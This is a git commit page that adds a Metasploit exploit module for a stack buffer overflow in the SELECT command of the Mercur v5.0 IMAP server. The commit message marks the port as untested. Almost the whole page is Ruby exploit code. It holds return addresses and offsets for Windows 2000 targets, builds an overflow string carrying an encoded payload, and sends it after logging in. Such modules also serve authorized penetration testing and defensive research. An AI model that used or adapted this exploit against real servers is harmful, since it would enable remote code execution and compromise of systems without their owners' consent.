ported mercur_imap_select_overflow.pm, untested.
git-svn-id: file:///home/svn/framework3/trunk@4245 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
7da10dd53e
commit
84c7edbbc5
|
@ -0,0 +1,68 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::Imap::Mercur_Imap_Select_Overflow < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Imap
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',
|
||||
'Description' => %q{
|
||||
Mercur v5.0 IMAP server is prone to a remotely exploitable
|
||||
stack-based buffer overflow vulnerability. This issue is due
|
||||
to a failure of the application to properly bounds check
|
||||
user-supplied data prior to copying it to a fixed size memory buffer.
|
||||
Credit to Tim Taylor for discover the vulnerability.
|
||||
},
|
||||
'Author' => [ 'Jacopo Cervini <acaro [at] jervus.it>' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision: 3782 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'BID', '17138' ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 400,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows 2000 Server SP4 English', { 'Offset' => 126, 'Ret' => 0x13e50b42 }],
|
||||
['Windows 2000 Pro SP1 English', { 'Offset' => 127, 'Ret' => 0x1446e242 }],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Mar 17 2006'))
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
sploit = "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"
|
||||
sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])
|
||||
sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8)
|
||||
sploit << payload.encoded + rand_text_alpha_upper(453)
|
||||
|
||||
info = connect_login
|
||||
|
||||
if (info == true)
|
||||
print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)
|
||||
sock.put(sploit + "\r\n")
|
||||
else
|
||||
print_status("Not falling through with exploit")
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue